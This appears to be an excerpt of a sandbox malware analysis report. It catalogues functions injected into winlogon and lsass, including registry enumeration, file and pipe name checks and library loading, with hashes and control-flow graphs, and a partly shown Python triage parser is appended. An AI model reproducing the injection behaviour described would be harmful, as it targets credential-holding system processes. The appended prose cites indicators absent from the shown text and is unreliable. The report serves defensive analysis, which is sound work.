                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: DB113036214B4182EB618F15F4403A977E5F798BA4F584225EE9C07798DF3CCA51C704
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: cbed634acb7f4e420854ae58bba93560634c5ebebd018ce6374671fac8fe3439
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 95E0807264074591DF014F61D4402E47360D798774B449231AD5C46355F63CD2E9C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 27eb8d332144c49fc42977003a1dd22787e74c1ec773337d6b22f03e146d9e6f
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 2DE08671641B4990DF038F21E8402E837A1DBA8BB4F589232AD6C0A395FB3CD3E9C701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796982184.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: e5f91ae01f9c44b97bbe6ed0de8d9856cd4c38cc7e306267f4dcf56f001a539c
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 1AE08672600B4581DF028F61D4402E87360E7A8BB4B889232EE5C46355EA3CD2E9C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 9cfed72d77cccaa36cf3e22940643e972630171375edc54bb3644584a963761a
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: E6E08671601B4990DF038F21E4401E87761E7A8BA4F989232ED5C0A395FB3CD3E5C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 61c98598d725439005a8348cc94fee34ff644915bea9077b60c4904ec0b0c66d
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: E1119D35601B4681EE86CF66A4042BA63A0FBD9FE0F584234FE5D577A9DE3CC9428300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001F.00000002.2796742898.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction ID: feab5681243c9ea3ef05db4ea452e02591ff6f6f4dae11f5b3763983b80706bc
                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: F8E0ED3160160182EB458FA2D8083AA36E0FBE9FA2F84C024DD1807394DF3C8188C750
                                                        Memory Dump Source
                                                        • Source File: 00000024.00000002.1568565779.00007FF752D51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF752D50000, based on PE: true
                                                        • Associated: 00000024.00000002.1568499666.00007FF752D50000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000024.00000002.1568660993.00007FF752D5C000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000024.00000002.1568716809.00007FF752D5F000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000024.00000002.1569372808.00007FF752FDE000.00000008.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000024.00000002.1569975980.00007FF753254000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000024.00000002.1570048620.00007FF75328C000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_36_2_7ff752d50000_eejhedztifcv.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction ID: 700eb59ec7ba3dc87a49091ed17442f2cf39a07078dfd6795f9b3a1cbef0bee8
                                                        • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                        • Instruction Fuzzy Hash: DBB09231A0530984E2003B15DC4135962606B08741F940030C40C02352CAED9040CB30

                                                        Execution Graph

                                                        Execution Coverage:1%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:126
                                                        Total number of Limit Nodes:10
                                                        execution_graph 14651 2a29199253c 14653 2a2919925bb 14651->14653 14652 2a2919927aa 14653->14652 14654 2a29199261d GetFileType 14653->14654 14655 2a29199262b StrCpyW 14654->14655 14656 2a291992641 14654->14656 14657 2a291992650 14655->14657 14667 2a291991a40 GetFinalPathNameByHandleW 14656->14667 14661 2a29199265a 14657->14661 14664 2a2919926ff 14657->14664 14660 2a291993844 StrCmpNIW 14660->14664 14661->14652 14672 2a291993844 14661->14672 14675 2a291993044 StrCmpIW 14661->14675 14679 2a291991cac 14661->14679 14664->14652 14664->14660 14665 2a291993044 4 API calls 14664->14665 14666 2a291991cac 2 API calls 14664->14666 14665->14664 14666->14664 14668 2a291991a6a StrCmpNIW 14667->14668 14669 2a291991aa9 14667->14669 14668->14669 14670 2a291991a84 lstrlenW 14668->14670 14669->14657 14670->14669 14671 2a291991a96 StrCpyW 14670->14671 14671->14669 14673 2a291993851 StrCmpNIW 14672->14673 14674 2a291993866 14672->14674 14673->14674 14674->14661 14676 2a29199308d PathCombineW 14675->14676 14677 2a291993076 StrCpyW StrCatW 14675->14677 14678 2a291993096 14676->14678 14677->14678 14678->14661 14680 2a291991cc3 14679->14680 14681 2a291991ccc 14679->14681 14683 2a29199152c 14680->14683 14681->14661 14684 2a29199157c 14683->14684 14685 2a291991546 14683->14685 14684->14681 14685->14684 14686 2a29199155d StrCmpIW 14685->14686 14687 2a291991565 StrCmpW 14685->14687 14686->14685 14687->14685 14688 2a291991abc 14693 2a291991628 GetProcessHeap HeapAlloc 14688->14693 14690 2a291991ad2 Sleep SleepEx 14691 2a291991acb 14690->14691 14691->14690 14692 2a291991598 StrCmpIW StrCmpW 14691->14692 14692->14691 14744 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14693->14744 14695 2a291991650 14745 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14695->14745 14697 2a291991658 14746 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14697->14746 14699 2a291991661 14747 2a291991268 GetProcessHeap 
HeapAlloc GetProcessHeap HeapAlloc 14699->14747 14701 2a29199166a 14748 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14701->14748 14703 2a291991673 14749 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14703->14749 14705 2a29199167c 14750 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14705->14750 14707 2a291991685 14751 2a291991000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14707->14751 14709 2a29199168e RegOpenKeyExW 14710 2a2919916c0 RegOpenKeyExW 14709->14710 14711 2a2919918a6 14709->14711 14712 2a2919916ff RegOpenKeyExW 14710->14712 14713 2a2919916e9 14710->14713 14711->14691 14714 2a29199173a RegOpenKeyExW 14712->14714 14715 2a291991723 14712->14715 14752 2a2919912bc RegQueryInfoKeyW 14713->14752 14719 2a29199175e 14714->14719 14720 2a291991775 RegOpenKeyExW 14714->14720 14761 2a29199104c RegQueryInfoKeyW 14715->14761 14722 2a2919912bc 16 API calls 14719->14722 14723 2a2919917b0 RegOpenKeyExW 14720->14723 14724 2a291991799 14720->14724 14725 2a29199176b RegCloseKey 14722->14725 14727 2a2919917eb RegOpenKeyExW 14723->14727 14728 2a2919917d4 14723->14728 14726 2a2919912bc 16 API calls 14724->14726 14725->14720 14731 2a2919917a6 RegCloseKey 14726->14731 14729 2a29199180f 14727->14729 14730 2a291991826 RegOpenKeyExW 14727->14730 14732 2a2919912bc 16 API calls 14728->14732 14734 2a29199104c 6 API calls 14729->14734 14735 2a29199184a 14730->14735 14736 2a291991861 RegOpenKeyExW 14730->14736 14731->14723 14733 2a2919917e1 RegCloseKey 14732->14733 14733->14727 14737 2a29199181c RegCloseKey 14734->14737 14738 2a29199104c 6 API calls 14735->14738 14739 2a29199189c RegCloseKey 14736->14739 14740 2a291991885 14736->14740 14737->14730 14741 2a291991857 RegCloseKey 14738->14741 14739->14711 14742 2a29199104c 6 API calls 14740->14742 14741->14736 14743 2a291991892 RegCloseKey 14742->14743 14743->14739 14744->14695 14745->14697 14746->14699 14747->14701 14748->14703 14749->14705 14750->14707 14751->14709 14753 2a29199148a 
RegCloseKey 14752->14753 14754 2a291991327 GetProcessHeap HeapAlloc 14752->14754 14753->14712 14755 2a291991352 RegEnumValueW 14754->14755 14756 2a291991476 GetProcessHeap HeapFree 14754->14756 14757 2a2919913a5 14755->14757 14756->14753 14757->14755 14757->14756 14758 2a29199152c 2 API calls 14757->14758 14759 2a29199141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14757->14759 14760 2a2919913d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14757->14760 14758->14757 14759->14757 14760->14759 14762 2a2919911b5 RegCloseKey 14761->14762 14765 2a2919910bf 14761->14765 14762->14714 14763 2a2919910cf RegEnumValueW 14763->14765 14764 2a29199114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14764->14765 14765->14762 14765->14763 14765->14764 14766 2a29199202c 14767 2a29199205d 14766->14767 14768 2a291992173 14767->14768 14775 2a291992081 14767->14775 14779 2a29199213e 14767->14779 14769 2a2919921e7 14768->14769 14770 2a291992178 14768->14770 14772 2a2919921ec 14769->14772 14769->14779 14787 2a291992f04 GetProcessHeap HeapAlloc 14770->14787 14774 2a291992f04 11 API calls 14772->14774 14773 2a2919920b9 StrCmpNIW 14773->14775 14777 2a291992190 14774->14777 14775->14773 14776 2a2919920e0 14775->14776 14775->14779 14776->14775 14780 2a291991bf4 14776->14780 14777->14777 14777->14779 14781 2a291991c1b GetProcessHeap HeapAlloc 14780->14781 14782 2a291991c8f 14780->14782 14781->14782 14783 2a291991c56 14781->14783 14782->14776 14784 2a291991c77 GetProcessHeap HeapFree 14783->14784 14785 2a29199152c 2 API calls 14783->14785 14784->14782 14786 2a291991c6e 14785->14786 14786->14784 14791 2a291992f57 14787->14791 14788 2a291993015 GetProcessHeap HeapFree 14788->14777 14789 2a291993010 14789->14788 14790 2a291992fa2 StrCmpNIW 14790->14791 14791->14788 14791->14789 14791->14790 14792 2a291991bf4 6 API calls 14791->14792 14792->14791 14793 2a2911c273c 14796 2a2911c276a 14793->14796 14794 2a2911c2858 LoadLibraryA 14794->14796 14795 2a2911c28d4 14796->14794 14796->14795

                                                        Control-flow Graph

                                                        control_flow_graph 5 2a29199253c-2a2919925c0 call 2a2919b2cc0 8 2a2919925c6-2a2919925c9 5->8 9 2a2919927d8-2a2919927fb 5->9 8->9 10 2a2919925cf-2a2919925dd 8->10 10->9 11 2a2919925e3-2a291992629 call 2a291998c60 * 3 GetFileType 10->11 18 2a29199262b-2a29199263f StrCpyW 11->18 19 2a291992641-2a29199264b call 2a291991a40 11->19 20 2a291992650-2a291992654 18->20 19->20 22 2a29199265a-2a291992673 call 2a2919930a8 call 2a291993844 20->22 23 2a2919926ff-2a291992704 20->23 35 2a2919926aa-2a2919926f4 call 2a2919b2cc0 22->35 36 2a291992675-2a2919926a4 call 2a2919930a8 call 2a291993044 call 2a291991cac 22->36 25 2a291992707-2a29199270c 23->25 27 2a29199270e-2a291992711 25->27 28 2a291992729 25->28 27->28 31 2a291992713-2a291992716 27->31 29 2a29199272c-2a291992745 call 2a2919930a8 call 2a291993844 28->29 47 2a291992787-2a291992789 29->47 48 2a291992747-2a291992776 call 2a2919930a8 call 2a291993044 call 2a291991cac 29->48 31->28 33 2a291992718-2a29199271b 31->33 33->28 37 2a29199271d-2a291992720 33->37 35->9 49 2a2919926fa 35->49 36->9 36->35 37->28 40 2a291992722-2a291992727 37->40 40->28 40->29 50 2a29199278b-2a2919927a5 47->50 51 2a2919927aa-2a2919927ad 47->51 48->47 68 2a291992778-2a291992783 48->68 49->22 50->25 54 2a2919927af-2a2919927b5 51->54 55 2a2919927b7-2a2919927ba 51->55 54->9 58 2a2919927bc-2a2919927bf 55->58 59 2a2919927d5 55->59 58->59 62 2a2919927c1-2a2919927c4 58->62 59->9 62->59 64 2a2919927c6-2a2919927c9 62->64 64->59 66 2a2919927cb-2a2919927ce 64->66 66->59 69 2a2919927d0-2a2919927d3 66->69 68->9 70 2a291992785 68->70 69->9 69->59 70->25
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: b60ce313c48d00840e0b1213c085003e09fb0053b976659188ccf0f46ed53324
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: B0717F263007A2C7F6A99E2BDA483AF6694F38EF84F640026DD0953B8DDF35D64D8741

                                                        Control-flow Graph

                                                        control_flow_graph 72 2a29199202c-2a291992057 call 2a2919b2d00 74 2a29199205d-2a291992066 72->74 75 2a29199206f-2a291992072 74->75 76 2a291992068-2a29199206c 74->76 77 2a291992223-2a291992243 75->77 78 2a291992078-2a29199207b 75->78 76->75 79 2a291992081-2a291992093 78->79 80 2a291992173-2a291992176 78->80 79->77 83 2a291992099-2a2919920a5 79->83 81 2a2919921e7-2a2919921ea 80->81 82 2a291992178-2a291992192 call 2a291992f04 80->82 81->77 87 2a2919921ec-2a2919921ff call 2a291992f04 81->87 82->77 92 2a291992198-2a2919921ae 82->92 85 2a2919920d3-2a2919920de call 2a291991bbc 83->85 86 2a2919920a7-2a2919920b7 83->86 93 2a2919920ff-2a291992111 85->93 100 2a2919920e0-2a2919920f8 call 2a291991bf4 85->100 86->85 89 2a2919920b9-2a2919920d1 StrCmpNIW 86->89 87->77 99 2a291992201-2a291992209 87->99 89->85 89->93 92->77 98 2a2919921b0-2a2919921cc 92->98 96 2a291992121-2a291992123 93->96 97 2a291992113-2a291992115 93->97 103 2a29199212a 96->103 104 2a291992125-2a291992128 96->104 101 2a29199211c-2a29199211f 97->101 102 2a291992117-2a29199211a 97->102 105 2a2919921d0-2a2919921e3 98->105 99->77 106 2a29199220b-2a291992213 99->106 100->93 112 2a2919920fa-2a2919920fd 100->112 109 2a29199212d-2a291992130 101->109 102->109 103->109 104->109 105->105 110 2a2919921e5 105->110 111 2a291992216-2a291992221 106->111 113 2a29199213e-2a291992141 109->113 114 2a291992132-2a291992138 109->114 110->77 111->77 111->111 112->109 113->77 115 2a291992147-2a29199214b 113->115 114->83 114->113 116 2a29199214d-2a291992150 115->116 117 2a291992162-2a29199216e 115->117 116->77 118 2a291992156-2a29199215b 116->118 117->77 118->115 119 2a29199215d 118->119 119->77
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: S$dialer
                                                        • API String ID: 756756679-3873981283
                                                        • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction ID: 31f48a6878fe19fac89be96b3cc806bef6c18fe058c887360822b4faed0dbcc7
                                                        • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                        • Instruction Fuzzy Hash: BC519F76B10636C7FBADCB2BEA4866E63A5F70AB94F249011DE0512B49DF35C85DC301

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction ID: a357d2d52508768e3afd4e1e04428e6709925dc5c1eedb762baf769dbdce5509
                                                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                        • Instruction Fuzzy Hash: 04F03622304652D3FBA08B2AFA8875A6761F75DF98FE44020DA4946598DE6CC64DCB01

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                        • Instruction ID: 86e556b0d161359026d3ca046b5028f94ccd685030e32d18bd1b6eadd8f9c152
                                                        • Opcode Fuzzy Hash: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                        • Instruction Fuzzy Hash: 2EE06D79711614C3FB488B27D90824A3AA1FB8DF02F948020C90907350DF38949CC611

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 58e4f2d2b6d44b688d357d41d78580bd9e8a4ecd447c4753187665df867a6417
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: E4115E30750663C3F7E09F7BFB4E35B2294A79EF45FB04128991A41699EF78D28C8212

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002A291991628: GetProcessHeap.KERNEL32 ref: 000002A291991633
                                                          • Part of subcall function 000002A291991628: HeapAlloc.KERNEL32 ref: 000002A291991642
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916B2
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916DF
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919916F9
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991719
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991734
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991754
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199176F
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199178F
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917AA
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919917CA
                                                        • Sleep.KERNEL32 ref: 000002A291991AD7
                                                        • SleepEx.KERNELBASE ref: 000002A291991ADD
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917E5
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991805
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991820
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991840
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199185B
                                                          • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199187B
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991896
                                                          • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919918A0
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2802003819.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a291990000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 3c2d3c73657fef33275c25727780f265ec2bd7433f006fbc608fa0bc8dfbb08e
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 2231ED61700662C3FBD09B2BD74936B13A5BB4EFE9F2854318E0B8729DEE14C45D8212

                                                        Control-flow Graph

                                                        control_flow_graph 177 2a2911c273c-2a2911c27a4 call 2a2911c29d4 * 4 186 2a2911c27aa-2a2911c27ad 177->186 187 2a2911c29b2 177->187 186->187 189 2a2911c27b3-2a2911c27b6 186->189 188 2a2911c29b4-2a2911c29d0 187->188 189->187 190 2a2911c27bc-2a2911c27bf 189->190 190->187 191 2a2911c27c5-2a2911c27e6 190->191 191->187 193 2a2911c27ec-2a2911c280c 191->193 194 2a2911c280e-2a2911c2836 193->194 195 2a2911c2838-2a2911c283f 193->195 194->194 194->195 196 2a2911c28df-2a2911c28e6 195->196 197 2a2911c2845-2a2911c2852 195->197 198 2a2911c28ec-2a2911c2901 196->198 199 2a2911c2992-2a2911c29b0 196->199 197->196 200 2a2911c2858-2a2911c286a LoadLibraryA 197->200 198->199 201 2a2911c2907 198->201 199->188 202 2a2911c28ca-2a2911c28d2 200->202 203 2a2911c286c-2a2911c2878 200->203 206 2a2911c290d-2a2911c2921 201->206 202->200 204 2a2911c28d4-2a2911c28d9 202->204 207 2a2911c28c5-2a2911c28c8 203->207 204->196 209 2a2911c2982-2a2911c298c 206->209 210 2a2911c2923-2a2911c2934 206->210 207->202 208 2a2911c287a-2a2911c287d 207->208 214 2a2911c287f-2a2911c28a5 208->214 215 2a2911c28a7-2a2911c28b7 208->215 209->199 209->206 212 2a2911c293f-2a2911c2943 210->212 213 2a2911c2936-2a2911c293d 210->213 217 2a2911c294d-2a2911c2951 212->217 218 2a2911c2945-2a2911c294b 212->218 216 2a2911c2970-2a2911c2980 213->216 219 2a2911c28ba-2a2911c28c1 214->219 215->219 216->209 216->210 220 2a2911c2963-2a2911c2967 217->220 221 2a2911c2953-2a2911c2961 217->221 218->216 219->207 220->216 223 2a2911c2969-2a2911c296c 220->223 221->216 223->216
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000025.00000002.2798699900.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_37_2_2a2911c0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: b4be3b6af767c20a18f202599a4ffb0d2b1a842901df5322d96555700405c82d
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: B4610532B016B2D7DBA4CF1A900476E7392F755FA4F688121DE5907788EF38D85AE702
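The entries above are the report's per-function metadata for code dumped out of winlogon.exe (process 31, 0x1F in the Source File field) and lsass.exe (process 37, 0x25). Each "Memory Dump Source" block names the dump the function was lifted from, the snapshot file, an "API ID" (API-name fragments joined with "$"), a "String ID" (referenced strings joined with "$") and two hashes; the Opcode ID survives instruction-level differences, which is why the winlogon dump shows one Opcode ID (af0f0512...) under two different Instruction IDs. The parser below is an added example written for this page; it is not part of the Joe Sandbox report and not Joe Security's code. It assumes the field layout and the snapshot naming pattern hcaresult_<process index>_<round>_<image base>_<process>.jbxd exactly as they appear above, and its RULES table is an analyst-chosen heuristic over indicators that occur on this page (NtQueryObject resolved beside \Device\Nsi in lsass, GetFileType beside \\.\pipe\), not a Joe Sandbox signature. The sample text is constructed by abbreviating four of the entries above.

```python
"""Parse Joe Sandbox per-function entries (Memory Dump Source blocks) and triage them.

Added example for this report, not Joe Security code.  Assumed from the page layout:
fields are '• Key: value' lines, '$' separates items in 'API ID' / 'String ID', and
'Snapshot File' is hcaresult_<process index>_<round>_<image base hex>_<process>.jbxd.
"""
import re

FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*?)\s*$")
SNAPSHOT_RE = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$")

# Constructed sample: four entries abbreviated from this report's winlogon and lsass dumps.
SAMPLE = r"""Memory Dump Source
• Source File: 0000001F.00000002.2796591793.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
• Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
• Instruction ID: e5f91ae01f9c44b97bbe6ed0de8d9856cd4c38cc7e306267f4dcf56f001a539c
Memory Dump Source
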